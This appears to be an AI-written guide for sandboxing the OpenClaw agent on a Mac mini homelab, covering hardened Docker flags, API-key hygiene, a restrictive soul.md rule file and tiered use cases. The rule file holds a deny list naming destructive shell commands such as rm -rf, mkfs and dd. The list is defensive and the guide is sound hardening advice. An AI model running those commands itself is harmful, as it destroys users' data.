Do not expose the gateway port (18789 or 3000) to your LAN. Keep it bound to 127.0.0.1.
If you need remote access to the OpenClaw WebUI, use SSH port forwarding or Tailscale — never open a port on your router.
Consider temporarily disconnecting or firewalling off your NAS and homelab VLANs while experimenting, or run OpenClaw on a separate VLAN if your router supports it.
Since you use Twingate, do not install a Twingate connector in the sandbox environment — keep your tunnel topology separate.

Phase 2 — Set Up Isolation Boundary

You have two good options. Docker is the recommended path for exploration.

Option A: Docker Container (Recommended)

Since you already use OrbStack on your Mac mini, this is the natural fit.

# Log in as the openclaw-sandbox user
# All paths below assume the external NVMe is mounted at /Volumes/OpenClaw-Sandbox

# Create directory structure on the external drive
mkdir -p /Volumes/OpenClaw-Sandbox/openclaw-config
mkdir -p /Volumes/OpenClaw-Sandbox/openclaw-workspace

# Clone the repo for reference (optional)
git clone https://github.com/openclaw/openclaw.git /Volumes/OpenClaw-Sandbox/openclaw-repo

# Run with hardened flags
docker run -d \
  --name openclaw \
  --restart unless-stopped \
  --user 1000:1000 \
  --read-only \
  --cap-drop=ALL \
  --security-opt=no-new-privileges \
  --memory=2g \
  --cpus=2 \
  -v /Volumes/OpenClaw-Sandbox/openclaw-config:/root/.openclaw \
  -v /Volumes/OpenClaw-Sandbox/openclaw-workspace:/workspace \
  -p 127.0.0.1:3000:3000 \
  ghcr.io/openclaw/openclaw:latest

Key hardening flags explained:

Flag	Purpose
`--user 1000:1000`	Run as non-root inside the container
`--read-only`	Container filesystem is read-only (writes only to mounted volumes)
`--cap-drop=ALL`	Drop all Linux capabilities
`--security-opt=no-new-privileges`	Prevent privilege escalation
`--memory=2g`	Cap memory usage
`-p 127.0.0.1:3000:3000`	Bind only to localhost, not the LAN

Option B: Docker Compose (For More Control)

Create /Volumes/OpenClaw-Sandbox/docker-compose.yml:

version: "3.9"
services:
  openclaw:
    image: ghcr.io/openclaw/openclaw:latest
    container_name: openclaw
    restart: unless-stopped
    user: "1000:1000"
    read_only: true
    cap_drop:
      - ALL
    security_opt:
      - no-new-privileges
    mem_limit: 2g
    cpus: 2
    ports:
      - "127.0.0.1:3000:3000"
    volumes:
      - /Volumes/OpenClaw-Sandbox/openclaw-config:/root/.openclaw
      - /Volumes/OpenClaw-Sandbox/openclaw-workspace:/workspace
    environment:
      - OPENCLAW_LOG_LEVEL=info
      # API key goes here -- see Phase 3

Option C: Docker Sandbox (Advanced)

Docker Desktop now offers Docker Sandboxes which provide micro-VM level isolation. If you want even stronger boundaries:

docker sandbox create --name openclaw -t ghcr.io/openclaw/openclaw:latest shell
docker sandbox network proxy openclaw --allow-host localhost
docker sandbox run openclaw

This runs OpenClaw in an isolated micro-VM where the network proxy can inject API keys without the agent ever seeing them directly.

Phase 3 — Install and Configure OpenClaw

3.1 API Key Setup

You will need at least one LLM provider API key. Options:

Anthropic API key — recommended, since OpenClaw was originally built around Claude.
OpenAI API key — also fully supported.
Local model via Ollama — zero cloud dependency, maximum privacy, but lower capability.

Critical rule: Create a new, dedicated API key for OpenClaw. Do not reuse API keys from your other projects or homelab services. Set spending limits on this key via your provider’s dashboard.

Store the key as an environment variable in Docker, never in a config file that could be committed to a repo or read by the agent.

3.2 Run Onboarding

docker exec -it openclaw openclaw onboard

The wizard walks you through connecting a channel and selecting a model provider. For initial exploration, use WebChat only — do not connect WhatsApp, Telegram, or any messaging app tied to your personal accounts.

3.3 Write a Restrictive soul.md

This is the most important file. Create it at /Volumes/OpenClaw-Sandbox/openclaw-config/soul.md:

# Agent Rules

You are a sandboxed exploration agent. Follow these rules strictly:

## Hard Constraints

- NEVER send emails, messages, or any outbound communication without explicit approval.
- NEVER access, read, or reference any files outside of /workspace.
- NEVER make network requests to local/private IP ranges (10.x, 172.16-31.x, 192.168.x).
- NEVER store, log, or transmit API keys, passwords, or credentials.
- NEVER install skills from ClawHub without explicit user approval and source review.
- NEVER delete files -- move to /workspace/trash instead.
- NEVER execute destructive shell commands (rm -rf, mkfs, dd, etc.).
- NEVER make purchases, financial transactions, or sign up for services.

## Behavioral Guidelines

- Always confirm before executing shell commands. Show the command first, wait for approval.
- When browsing the web, do not submit forms or click through auth flows.
- Keep all work products in /workspace.
- If uncertain about a task, ask for clarification rather than guessing.

3.4 Run Security Audit

After setup, run:

docker exec -it openclaw openclaw security audit --deep

This flags common misconfigurations including exposed gateway ports, overly permissive allowlists, and filesystem permission issues.

Phase 4 — Harden the Deployment

4.1 Network Isolation

Verify the gateway is bound to localhost only: lsof -i :3000 should show 127.0.0.1.
If your router supports VLANs, put the Mac mini on an isolated VLAN for experimentation that cannot reach your NAS or other homelab devices.
Consider using Little Snitch or the macOS firewall on the sandbox user to block unexpected outbound connections.

4.2 Credential Hygiene

Use a dedicated, throwaway email address if any channel or skill requires one.
Create separate accounts for any service you integrate (GitHub, calendar, etc.) — never your primary accounts.
Rotate the API key weekly during active exploration.

4.3 Skill Vetting Protocol

Before installing any skill:

Read the full source code of the SKILL.md and any accompanying scripts.
Check for shell commands, network requests, or file access outside expected paths.
Look for obfuscated code, base64-encoded strings, or calls to external URLs.
Prefer skills from the official github.com/openclaw/skills repo over random ClawHub submissions.
Start with read-only skills before enabling write/exec skills.

4.4 Monitoring

Check container logs regularly: docker logs openclaw --tail 100
Monitor resource usage: docker stats openclaw
Review the workspace directory for unexpected files.
Periodically run openclaw security audit inside the container.

Phase 5 — Explore Use Cases

Start simple, add complexity gradually. Each tier builds on the previous.

Tier 1 — Low Risk (Read-Only, No External Integrations)

These are safe starting points with minimal blast radius.

WebChat conversations — Just talk to the agent through the local WebUI. Ask it to summarize articles, explain concepts, or brainstorm ideas. No tools or skills needed.
File generation in workspace — Ask the agent to create markdown files, write code snippets, or generate documentation inside /workspace.
Web research — Have the agent browse and summarize public web pages. Keep it read-only (no form submissions or logins).

Tier 2 — Medium Risk (Local Tools, No Personal Accounts)

Shell command execution (supervised) — With your soul.md approval-gate in place, let the agent run commands and observe how it handles multi-step tasks. Good for understanding the exec tool behavior.
Code generation and review — Point the agent at a codebase in /workspace and ask it to review, refactor, or generate code. Relevant for your Android work — have it scaffold Jetpack Compose components or write Gradle build scripts.
Browser automation — Let the agent control a headless Chromium instance inside the container. Watch how it navigates pages and extracts data.
Cron scheduling — Set up simple scheduled tasks (e.g., “every morning at 8am, summarize the top 5 Hacker News stories and save to /workspace/daily-digest/”).
Local model experimentation — If you install Ollama on the Mac mini, configure OpenClaw to use it via http://host.docker.internal:11434. This gives you a fully offline, zero-cloud setup.

Tier 3 — Higher Risk (External Channels, Carefully Scoped)

Only proceed here after you are comfortable with Tier 2.

Telegram bot (dedicated account) — Create a new Telegram account (use a prepaid SIM or Google Voice number, not your personal number). Connect it as a channel. This lets you message the agent from your phone.
Discord bot (dedicated server) — Create a private Discord server with only you in it. Connect OpenClaw as a bot. Good for testing multi-user/channel routing.
GitHub integration (throwaway repo) — Create a fresh GitHub account or use a test repo. Let the agent manage issues, PRs, or code deployments in a sandbox repo. Never connect your primary GitHub.
Calendar integration (test calendar) — Create a separate Google account. Add a Google Calendar. Let the agent read and summarize events. Start read-only before enabling write access.

Tier 4 — Advanced (Proceed with Caution)

Multi-agent routing — Run multiple agent workspaces, each connected to different channels with different permission levels.
Smart home integration — If you have Home Assistant, you could let an agent read sensor data or trigger automations. Use a read-only HA API token scoped to specific entities.
Homelab monitoring — Since you run Netdata, you could build a skill that queries the Netdata API and sends you alerts via Telegram. Keep it read-only — the agent should never have write access to infrastructure.
Development workflow automation — Have the agent monitor a Git repo for new commits, run lint/test suites, and report results back to you on Telegram.

Recommended Use Cases for a Homelab Android Engineer

Based on your background, here are the use cases I think would be most valuable and relevant for you:

Daily Briefing Bot

Have OpenClaw send you a morning summary via Telegram (dedicated account) with weather, your top 3 calendar events, and Hacker News or Android dev news headlines. Low risk, high daily value. Start with the WebChat channel before graduating to Telegram.

Android Code Scaffold Generator

Point the agent at a workspace with your project structure conventions. Ask it to generate Jetpack Compose screens, ViewModel boilerplate, Gradle module configurations, or Room database entities. Review the output and iterate on your soul.md to fine-tune the style.

Homelab Status Dashboard

Build a skill that queries your Netdata instances (Mac mini, other nodes) via their REST API and compiles a status report. The agent can alert you if a container goes down or resource usage spikes. Keep the agent’s access strictly read-only.

Documentation Writer

Feed the agent your homelab setup notes (from your workspace directory) and ask it to produce clean markdown documentation — network diagrams, service inventories, Docker Compose references. Great for your private GitHub repo.

Research Assistant

Use the agent’s browser tool to research hardware, software, or infrastructure topics. For example: “Research the current state of Thunderbolt 5 NVMe enclosures and summarize the best options with pricing.” The agent saves results to your workspace.

Git PR Reviewer

Point the agent at a test GitHub repo. Push code and ask it to review your PRs, suggest improvements, and check for common Kotlin/Android pitfalls. Useful for solo projects where you lack a second pair of eyes.

RSS/News Aggregator

Have the agent pull from Android developer blogs, Kotlin newsletters, and homelab subreddits (r/homelab, r/selfhosted). It compiles a weekly digest saved to your workspace or sent via Telegram.

Docker Compose Generator

Describe a service you want to self-host, and have the agent generate a hardened Docker Compose file with security best practices baked in — non-root user, read-only filesystem, resource limits, health checks.

Skills Worth Exploring

These are from the official or well-vetted parts of the ecosystem. Always review source code before installing.

Skill	What It Does	Risk Level
`frontend-design` (official)	Forces production-grade UI output	Low
`exa-search`	Developer-focused web search using Exa index	Low
`openai-whisper`	Local speech-to-text transcription	Low
`self-improving-agent`	Logs errors and learnings to improve over time	Medium
`github` (built-in)	Manages repos, PRs, issues	Medium
`n8n-workflow`	Chat-driven control of local n8n instance	Medium
`composio`	Managed OAuth connector for 860+ services	Medium-High

Avoid installing skills that request broad file system access, network access to private IPs, or shell execution without clear justification.